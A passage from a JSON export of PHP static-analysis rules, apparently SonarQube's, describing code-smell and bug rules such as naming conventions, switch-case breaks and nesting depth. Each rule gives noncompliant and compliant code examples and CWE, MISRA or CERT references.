simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n return true;\n} else {\n return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n return $numerator \/ $denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n if (condition1) {\n return true;\n } else {\n if (condition2) {\n return false;\n } else {\n return true;\n }\n }\n return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo() {} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n ...\n }\n\n private function unusedPrivateFunction() { \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo(){} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n <li> Some value was left unset. <\/li>\n <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) { \/\/ Noncompliant\n doSomething();\n}\n...\nif (false) { \/\/ Noncompliant\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n case 0: \/\/ 6 lines till next case\n methodCall1();\n methodCall2();\n methodCall3();\n methodCall4();\n break;\n default:\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n case 0:\n doSomething();\n break;\n default:\n break;\n}\n\nfunction doSomething(){\n methodCall1(\"\");\n methodCall2(\"\");\n methodCall3(\"\");\n methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n $LOCAL;\n ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n $local;\n ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Functions in classes that override a class or implement interfaces are ignored.<\/p>\n<pre>\nclass C extends B {\n\n function doSomething($a, $b) { \/\/ no issue reported on $b\n compute($a);\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. <\/li>\n <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m); \/\/ Noncompliant\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m);\n \/\/ do additional things...\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends Parent {\n \/\/ function eliminated\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n prepare('action1'); \/\/ Non-Compliant - 'action1' is duplicated 3 times\n execute('action1');\n release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nACTION_1 = 'action1';\n\nfunction run() {\n prepare(ACTION_1);\n execute(ACTION_1);\n release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false-positives, literals having less than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested classes dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n class Foo { \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n \/**\n * @var T1\n *\/\n public $a1; \/\/ Foo is coupled to T1\n \/**\n * @var T2\n *\/\n protected $a2; \/\/ Foo is coupled to T2\n \/**\n * @var T3\n *\/\n private $a3; \/\/ Foo is coupled to T3\n\n \/**\n * @param T5\n * @param T6\n *\n * @return T4\n *\/\n public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n $result = new T7(); \/\/ Foo is coupled to T7\n return $result;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n executeSomething();\n checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n executeSomething();\n checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v > 2; }; \/\/ Compliant\n$max_comparator = function ($v) { echo $v; return $v > 2; }; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n} else {\n throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n <li> When the stop condition depend upon a method call <\/li>\n <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n if(condition) {\n $i = 20;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n}\n\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n loop. <\/li>\n <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2: \/\/ Both 'doSomething()' and 'doSomethingElse()' will be executed. Is it on purpose ?\n do_something();\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n case 0: \/\/ Empty case used to specify the same behavior for a group of cases.\n case 1:\n do_something();\n break;\n case 2: \/\/ Use of continue statement\n continue;\n case 3: \/\/ Case includes a jump statement (exit, return, break &etc)\n exit(0);\n case 4:\n echo 'Second case, which falls through';\n \/\/ no break <- comment is used when fall-through is intentional in a non-empty case body\n default: \/\/ For the last case, use of break statement is optional\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n case 0:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n do_something();\n} else {\n do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) { \/\/missing default clause\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n\nswitch ($param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n ...\n if (condition2) { \/\/ Compliant - depth = 2\n ...\n for($ = 0; $i < 10; $i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n ...\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n ...\n }\n return;\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one 